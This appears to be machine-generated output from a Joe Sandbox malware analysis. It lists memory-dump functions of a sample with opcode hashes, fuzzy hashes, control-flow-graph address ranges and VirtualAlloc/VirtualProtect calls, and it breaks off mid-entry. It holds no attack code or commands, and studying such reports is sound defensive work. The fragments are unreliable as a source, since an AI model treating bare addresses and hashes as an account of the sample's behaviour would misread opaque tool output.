                                        Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 125d53d462be2817477351489d7b70279e8761ab25da074e2abf15c0a2ff3aca
                                        • Instruction ID: 23c9c11f4004292fed8cbbe1e90efbf7a34197e50056db99b2e844963e484cfa
                                        • Opcode Fuzzy Hash: 125d53d462be2817477351489d7b70279e8761ab25da074e2abf15c0a2ff3aca
                                        • Instruction Fuzzy Hash: B1F0373091564D9FDB90EFA4D459AFE7BE0FF18304F014576E81DD2160DB74A6A4CB81
                                        Function 00007FFD9BAB9FD8 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42974481bdaed44aa74a26a4795a4d54aa01f59e5690ce5a70699a6795b11388
                                        • Instruction ID: 435adbaf93c7acba62f551a9507d584aa2eb6cc10735e53becc29518a8208fae
                                        • Opcode Fuzzy Hash: 42974481bdaed44aa74a26a4795a4d54aa01f59e5690ce5a70699a6795b11388
                                        • Instruction Fuzzy Hash: 69F0123091460D9FDF94EF6888496FE77E1FF58305F504576E81CC21A4DB34A2A0CB81
                                        Function 00007FFD9BAA0CCF Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ffaeef4cd486fa70dae1f9f8ee4f266ccc4aca7fc410dfd76f60e69d65f72e4e
                                        • Instruction ID: fb9bf87525c1b5f4f99c22e5e261268d54cae6a8c6a3aeabdb6d4a3b23825616
                                        • Opcode Fuzzy Hash: ffaeef4cd486fa70dae1f9f8ee4f266ccc4aca7fc410dfd76f60e69d65f72e4e
                                        • Instruction Fuzzy Hash: 97F06270B0A61A8BE768DF94C8946FD73B2BF54711F05067AD01D922E2CBB86640CB55
                                        Function 00007FFD9BAA70E6 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12154962f538307c62c8618ab973b97109c95256c6768d8a6942da9d524f7a2b
                                        • Instruction ID: ec00218881221d954b0d64ca261608e5cce21712821378342c4296491f3e5655
                                        • Opcode Fuzzy Hash: 12154962f538307c62c8618ab973b97109c95256c6768d8a6942da9d524f7a2b
                                        • Instruction Fuzzy Hash: E3F03A70A0A5198AFB749B94C8543ADB3B1EF95300F2050BDC14EA33D1DE782B81CF15
                                        Function 00007FFD9BAC4053 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8fb160a8b0a944d81f62c4ec600899c01d48048d1ff8df5ea189577624956923
                                        • Instruction ID: cf872cfedb85781231633e63d4bf17496d6efdc4381d4103571b2efb6e5aa414
                                        • Opcode Fuzzy Hash: 8fb160a8b0a944d81f62c4ec600899c01d48048d1ff8df5ea189577624956923
                                        • Instruction Fuzzy Hash: E6E06531F0A51D4FE7A4EB88C8712FD32A2EF99340F814175E41E972E2CD762A418B40
                                        Function 00007FFD9BAB81ED Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 46cb20a11bfe9d75c5429aeceb9f29105520563386e2456566f00e531b6503ab
                                        • Instruction ID: 098a65f9b47936728651a370b6f4e8de1a03d488ab037d05c3ff36bd0c59f5d9
                                        • Opcode Fuzzy Hash: 46cb20a11bfe9d75c5429aeceb9f29105520563386e2456566f00e531b6503ab
                                        • Instruction Fuzzy Hash: B1F08C3184D68C9FDB51AB68885D6987FA0EF15311F1504EBD818C60A1DA349254CB01
                                        Function 00007FFD9BAC19ED Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8bc95f78c279d735a495a1dd9b4c18142486d2ddc50111bd4a96b8a9533eb6fa
                                        • Instruction ID: 2f1b9ff46708b12732a2b43872c50fd887aefb8acbb8535ae55448ab5000a9c0
                                        • Opcode Fuzzy Hash: 8bc95f78c279d735a495a1dd9b4c18142486d2ddc50111bd4a96b8a9533eb6fa
                                        • Instruction Fuzzy Hash: F3F07070F5E11D8AEB74ABF584557BC76B09F25301F71007AD00D931A2DE7856809F00
                                        Function 00007FFD9BAA6B59 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c2d8bf603f1ff3962be9e2841edff13bd36c87b6a4bb994ff247695d1b53e42
                                        • Instruction ID: fc9c2ca018d1ae3e38e0e8cc1e12ebcfb326bded0cc19542ceaccd9cbf1d9c4a
                                        • Opcode Fuzzy Hash: 2c2d8bf603f1ff3962be9e2841edff13bd36c87b6a4bb994ff247695d1b53e42
                                        • Instruction Fuzzy Hash: 4AE0EC31E2966C89EBA9DB20C855AEDB3B2EF54301F4545FB800EB2595DEB46B858F00

                                        Non-executed Functions

                                        Function 00007FFD9BAA09B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1955157487.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: c9$!k9$"s9$#{9
                                        • API String ID: 0-1692736845
                                        • Opcode ID: 9247aadfe4aa9312938d07efce70c0a06a92805d41d7b3271cefc4a155c38a24
                                        • Instruction ID: 1d68eb25b081636a8b7736070c2eaf00e284f1ace99c148ebcdac8ce8f81f8f4
                                        • Opcode Fuzzy Hash: 9247aadfe4aa9312938d07efce70c0a06a92805d41d7b3271cefc4a155c38a24
                                        • Instruction Fuzzy Hash: 77419D17B0952645E339B3BD7821AED6B449FA823FB0847B7F55E8D0C78D086485C2E9

                                        Execution Graph

                                        Execution Coverage:3%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:7
                                        Total number of Limit Nodes:1
                                        execution_graph 32551 7ffd9bab3b4d 32552 7ffd9bab3b22 32551->32552 32553 7ffd9bab3b6b VirtualAlloc 32551->32553 32555 7ffd9bab3c85 32553->32555 32547 7ffd9bab215e 32548 7ffd9bab216d VirtualProtect 32547->32548 32550 7ffd9bab22ad 32548->32550

                                        Executed Functions

                                        Function 00007FFD9BABBD2D Relevance: 1.8, Instructions: 1809COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 21 7ffd9babbd2d-7ffd9babbd68 22 7ffd9babbd6a 21->22 23 7ffd9babbd6f-7ffd9babbdcf 21->23 22->23 27 7ffd9babbddd-7ffd9babbdec 23->27 28 7ffd9babbdd1 23->28 29 7ffd9babbdee 27->29 30 7ffd9babbdf3-7ffd9babbdfc 27->30 28->27 29->30 31 7ffd9babbe29-7ffd9babbe84 30->31 32 7ffd9babbdfe-7ffd9babbe0d 30->32 43 7ffd9babbe86 31->43 44 7ffd9babbe8b-7ffd9babbf14 31->44 34 7ffd9babbe0f 32->34 35 7ffd9babbe14-7ffd9babd795 call 7ffd9babe9b6 32->35 34->35 40 7ffd9babd7a0-7ffd9babd7b2 35->40 43->44 51 7ffd9babbf16-7ffd9babbf79 44->51 52 7ffd9babbf7b-7ffd9babc124 44->52 51->52 72 7ffd9babce0e-7ffd9babce1b 52->72 73 7ffd9babc129-7ffd9babc137 72->73 74 7ffd9babce21-7ffd9babce63 72->74 76 7ffd9babc139 73->76 77 7ffd9babc13e-7ffd9babc292 73->77 82 7ffd9babcf20-7ffd9babcf26 74->82 76->77 124 7ffd9babc2df-7ffd9babc392 77->124 125 7ffd9babc294-7ffd9babc2d9 77->125 84 7ffd9babce68-7ffd9babcec5 82->84 85 7ffd9babcf2c-7ffd9babcf6e 82->85 97 7ffd9babcec7-7ffd9babcecb 84->97 98 7ffd9babcef2-7ffd9babcf1d 84->98 96 7ffd9babd1bc-7ffd9babd1c2 85->96 99 7ffd9babd1c8-7ffd9babd221 96->99 100 7ffd9babcf73-7ffd9babcfb6 96->100 97->98 102 7ffd9babcecd-7ffd9babceef 97->102 98->82 109 7ffd9babd227-7ffd9babd273 99->109 110 7ffd9babd2b0-7ffd9babd2be 99->110 117 7ffd9babcfb8-7ffd9babd00c 100->117 118 7ffd9babd00d-7ffd9babd0bb 100->118 102->98 109->110 115 7ffd9babd2c5-7ffd9babd307 110->115 135 7ffd9babd767-7ffd9babd76d 115->135 117->118 155 7ffd9babd14d-7ffd9babd151 118->155 156 7ffd9babd0c1-7ffd9babd14b 118->156 158 7ffd9babc394-7ffd9babc39c 124->158 159 7ffd9babc3a1-7ffd9babc3ac 124->159 125->124 139 7ffd9babd30c-7ffd9babd3aa 135->139 140 7ffd9babd773-7ffd9babd79f call 7ffd9babe9b6 135->140 171 7ffd9babd3ac-7ffd9babd3b7 139->171 172 7ffd9babd3da-7ffd9babd3e9 139->172 140->40 160 7ffd9babd187-7ffd9babd19a 155->160 161 7ffd9babd153-7ffd9babd185 155->161 173 7ffd9babd19b-7ffd9babd1b9 156->173 163 7ffd9babcdf9-7ffd9babce0b 158->163 167 7ffd9babc40e-7ffd9babc44f 159->167 168 7ffd9babc3ae-7ffd9babc40b 159->168 160->173 161->173 163->72 196 7ffd9babc45e-7ffd9babc50c 167->196 197 7ffd9babc451-7ffd9babc459 167->197 168->167 178 7ffd9babd40a-7ffd9babd40f 171->178 179 7ffd9babd3b9-7ffd9babd3cf 171->179 176 7ffd9babd3eb 172->176 177 7ffd9babd3f0-7ffd9babd3ff 172->177 173->96 176->177 181 7ffd9babd414-7ffd9babd42f 177->181 182 7ffd9babd401-7ffd9babd408 177->182 186 7ffd9babd746-7ffd9babd764 178->186 179->172 187 7ffd9babd44f-7ffd9babd73b 181->187 188 7ffd9babd431-7ffd9babd44b 181->188 182->178 186->135 187->186 188->187 209 7ffd9babc51b-7ffd9babc5c9 196->209 210 7ffd9babc50e-7ffd9babc516 196->210 197->163 218 7ffd9babc5d8-7ffd9babc686 209->218 219 7ffd9babc5cb-7ffd9babc5d3 209->219 210->163 227 7ffd9babc688-7ffd9babc690 218->227 228 7ffd9babc695-7ffd9babc743 218->228 219->163 227->163 236 7ffd9babc745-7ffd9babc74d 228->236 237 7ffd9babc752-7ffd9babc800 228->237 236->163 245 7ffd9babc80f-7ffd9babc81a 237->245 246 7ffd9babc802-7ffd9babc80a 237->246 248 7ffd9babc878 245->248 249 7ffd9babc81c-7ffd9babc877 245->249 246->163 251 7ffd9babc879-7ffd9babc8bd 248->251 249->248 249->251 256 7ffd9babc8cc-7ffd9babc97a 251->256 257 7ffd9babc8bf-7ffd9babc8c7 251->257 265 7ffd9babc97c-7ffd9babc984 256->265 266 7ffd9babc989-7ffd9babca37 256->266 257->163 265->163 274 7ffd9babca46-7ffd9babcaf4 266->274 275 7ffd9babca39-7ffd9babca41 266->275 283 7ffd9babcaf6-7ffd9babcafe 274->283 284 7ffd9babcb03-7ffd9babcb0e 274->284 275->163 283->163 286 7ffd9babcb69-7ffd9babcbb1 284->286 287 7ffd9babcb10-7ffd9babcb65 284->287 294 7ffd9babcbc0-7ffd9babcc6e 286->294 295 7ffd9babcbb3-7ffd9babcbbb 286->295 287->286 303 7ffd9babcc70-7ffd9babcc78 294->303 304 7ffd9babcc7d-7ffd9babcd2b 294->304 295->163 303->163 312 7ffd9babcd3a-7ffd9babcde8 304->312 313 7ffd9babcd2d-7ffd9babcd35 304->313 321 7ffd9babcdea-7ffd9babcdf2 312->321 322 7ffd9babcdf4-7ffd9babcdf6 312->322 313->163 321->163 322->163
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9babb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b9a6bbde7da5df2cd00641a255f7a1a4ce9d1c56055342df79a81e4410c96394
                                        • Instruction ID: b40ce7eef3099b64321dbea710f284a4584a7597ca1d625ad70cf95eb35fc005
                                        • Opcode Fuzzy Hash: b9a6bbde7da5df2cd00641a255f7a1a4ce9d1c56055342df79a81e4410c96394
                                        • Instruction Fuzzy Hash: FFF23E70E09A6D8FEBA8DB58C8A5BA8B7B1FF58310F4401F9D05DD7291DA746A81CF40
                                        Function 00007FFD9BB0CB41 Relevance: .6, Instructions: 550COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAFF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFF000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baff000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8e7d8a488f14d4f33a96e9896861e9b8bf4e37ac60df0441cd9e614551aaa01
                                        • Instruction ID: 6a5daf8a66644fd8cf7177e56ac76e858c15ac474ca617b8bd5012424a841ed9
                                        • Opcode Fuzzy Hash: b8e7d8a488f14d4f33a96e9896861e9b8bf4e37ac60df0441cd9e614551aaa01
                                        • Instruction Fuzzy Hash: 65122B30A19A5D8FDBA4EB58C8A5BF9B7B1FF58301F4101AAD44DE3295DF346A80CB40
                                        Function 00007FFD9BAEA4C7 Relevance: .4, Instructions: 406COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4222b4a100d7bb05882e755d45ddccefd9fdb9a27da11fd1a600b02421dc3b1d
                                        • Instruction ID: 681e2a6c66ef63fc7a612792806719fd08abca12c150e1405d08c691ccda51cc
                                        • Opcode Fuzzy Hash: 4222b4a100d7bb05882e755d45ddccefd9fdb9a27da11fd1a600b02421dc3b1d
                                        • Instruction Fuzzy Hash: 4202F770E0421D8FDB18DFA8C4A19EDFBB1FF48304F148569D41AAB25ADB34A985CF54
                                        Function 00007FFD9BAA0D70 Relevance: .3, Instructions: 278COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baa0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fdb0d61e2de25406772fbd70006783900d51ecdc09e9aea05a79fcc8810e1c79
                                        • Instruction ID: 7167547ceeae39a8c58fcdbe87858f7a735f92a063335baeeee1d0cb96ca01f6
                                        • Opcode Fuzzy Hash: fdb0d61e2de25406772fbd70006783900d51ecdc09e9aea05a79fcc8810e1c79
                                        • Instruction Fuzzy Hash: 1AA1CF72A08A9D8FE7A8DB68C8757A97BE2FF99314F4001BAD04DD72D6CB781841C750
                                        Function 00007FFD9BAF31B5 Relevance: 2.6, Strings: 2, Instructions: 105COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,$4
                                        • API String ID: 0-508195717
                                        • Opcode ID: e9deec8f62224b5fb4068c3b18619f89e62dc275523ed66dca92879e2a2cd963
                                        • Instruction ID: 4f9a6e8c7e2810e1f4e3bffda6463aac06dad706be1ba5ba3e131143e9580b5a
                                        • Opcode Fuzzy Hash: e9deec8f62224b5fb4068c3b18619f89e62dc275523ed66dca92879e2a2cd963
                                        • Instruction Fuzzy Hash: CC415B70A0964DCFDB68DF94C8A4BE9B7F1EF59310F5141AAC40AD72A1CB74AA85CF00
                                        Function 00007FFD9BAF3EC0 Relevance: 1.7, Strings: 1, Instructions: 488COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: f2856c50b7b0fb23cbde0c80ba66f885df0633b5ab1c28ea3b7459df6d93f98d
                                        • Instruction ID: 66a580252f5c7d65c1cc8233889c404f0db93ef199ae1e2ae9c313564a379aa4
                                        • Opcode Fuzzy Hash: f2856c50b7b0fb23cbde0c80ba66f885df0633b5ab1c28ea3b7459df6d93f98d
                                        • Instruction Fuzzy Hash: 4BD10631B19E4E4FDBA8DB5C98A4AF577E2FF98350B0502BAD44DC7296DE24EC458340
                                        Function 00007FFD9BAB215E Relevance: 1.7, APIs: 1, Instructions: 192memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 398 7ffd9bab215e-7ffd9bab216b 399 7ffd9bab2176-7ffd9bab2187 398->399 400 7ffd9bab216d-7ffd9bab2175 398->400 401 7ffd9bab2189-7ffd9bab2191 399->401 402 7ffd9bab2192-7ffd9bab22ab VirtualProtect 399->402 400->399 401->402 407 7ffd9bab22ad 402->407 408 7ffd9bab22b3-7ffd9bab2303 402->408 407->408
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAAB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baab000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: a5e1f5290be3bf6a5e90ab962f78431ddc96f6343e1ad74f1f6f7a167a74393c
                                        • Instruction ID: a3a8d8865e590d5d3471f2f92529e77cfd9e00168a56ab10e557507077b19d1c
                                        • Opcode Fuzzy Hash: a5e1f5290be3bf6a5e90ab962f78431ddc96f6343e1ad74f1f6f7a167a74393c
                                        • Instruction Fuzzy Hash: 87517D70D0874D8FDB54DFA8D845AEDBBF1FB6A310F1042AAD048E7256DB74A885CB81
                                        Function 00007FFD9BAFC641 Relevance: 1.6, Strings: 1, Instructions: 371COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W
                                        • API String ID: 0-655174618
                                        • Opcode ID: afdd5343bc8a5c75bc8aaefee34eb70da4c605301d62b251783cdaf327bb898f
                                        • Instruction ID: f33fcc34a07a90a1c13e4f33019a61a820a249ae894cb647d78fdb251e3a2867
                                        • Opcode Fuzzy Hash: afdd5343bc8a5c75bc8aaefee34eb70da4c605301d62b251783cdaf327bb898f
                                        • Instruction Fuzzy Hash: 9AC13832B0EB8D4FDB64DB6898751ED7FE1EF99314F0901BAD088D72A3EE2859018351
                                        Function 00007FFD9BAB3B4D Relevance: 1.5, APIs: 1, Instructions: 212memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 475 7ffd9bab3b4d-7ffd9bab3b69 476 7ffd9bab3b6b-7ffd9bab3c83 VirtualAlloc 475->476 477 7ffd9bab3b22-7ffd9bab3b4a 475->477 483 7ffd9bab3c85 476->483 484 7ffd9bab3c8b-7ffd9bab3cef 476->484 483->484
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAAB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baab000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: bab02022056cf30fb71f95ac44541f2b08040488b88c6d1bbc824a9801636cfd
                                        • Instruction ID: 592cba376e88f55dea59d54cdcf2f654ec8b6529310f599bc19ed04e794c805f
                                        • Opcode Fuzzy Hash: bab02022056cf30fb71f95ac44541f2b08040488b88c6d1bbc824a9801636cfd
                                        • Instruction Fuzzy Hash: F1512930908A1C8FDF94EF98D885BE9BBF1FB69310F1041AAD00DE3255DB71A9858F80
                                        Function 00007FFD9BAFDD61 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: 58e459b42c8def36458a5a198364da886120b5d4aabbd1028bfb7a3bf5b0f993
                                        • Instruction ID: 3d32e18ca75a6824845d3e507878ea340d1cdddfd381a8b621f546d12d4a1cd5
                                        • Opcode Fuzzy Hash: 58e459b42c8def36458a5a198364da886120b5d4aabbd1028bfb7a3bf5b0f993
                                        • Instruction Fuzzy Hash: 61515C31B1EB8E0FEB9ADB6884656B97BE1FF94354B0005FAD05CCB1D7DE28A8048340
                                        Function 00007FFD9BAFD0A1 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: M
                                        • API String ID: 0-3664761504
                                        • Opcode ID: b240284ba7c81ba539e1f74010f2596478d0155d910ca6f4ed2a07827d32ba36
                                        • Instruction ID: 2fc0510764ea5d2e860f99d978ec936df4ca603b93c9dd7daf85500c79947466
                                        • Opcode Fuzzy Hash: b240284ba7c81ba539e1f74010f2596478d0155d910ca6f4ed2a07827d32ba36
                                        • Instruction Fuzzy Hash: EB412870F1961D8FEBA8DB58D8947A8B7F1FB58300F5101AAD44ED32A1DF746A82CB05
                                        Function 00007FFD9BAFDCBD Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A
                                        • API String ID: 0-3554254475
                                        • Opcode ID: d3932b0d3d001648d1f7acd64b552761c3594a29e254acebb161d338b8d62d77
                                        • Instruction ID: 9e6011293ed5d1b912f182030a75567d3a9099c2d862e98efb5af13a47ab616f
                                        • Opcode Fuzzy Hash: d3932b0d3d001648d1f7acd64b552761c3594a29e254acebb161d338b8d62d77
                                        • Instruction Fuzzy Hash: C6112622B1EF1E0BDFA8DA5C54682BA6BC1EB98221B0101BFE44DC32A5ED59AC014380
                                        Function 00007FFD9BAFC750 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W
                                        • API String ID: 0-655174618
                                        • Opcode ID: e210c1d6078d76b323f7f80a8aef11267e7c0eb4f25a77cfb602e3532870d21b
                                        • Instruction ID: c2b10477872b1ced0cb470b2ca5450738e25d499293f22aac88f899a8e57bed1
                                        • Opcode Fuzzy Hash: e210c1d6078d76b323f7f80a8aef11267e7c0eb4f25a77cfb602e3532870d21b
                                        • Instruction Fuzzy Hash: 6F11047161EBC95FE7558769D4202A67FE1EFC5250F0801BFE088C62E7DAADDA058342
                                        Function 00007FFD9BAF6219 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 623 7ffd9baf6219-7ffd9baf6257 624 7ffd9baf6259 623->624 625 7ffd9baf625e-7ffd9baf627a 623->625 624->625 626 7ffd9baf6280-7ffd9baf628d 625->626
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
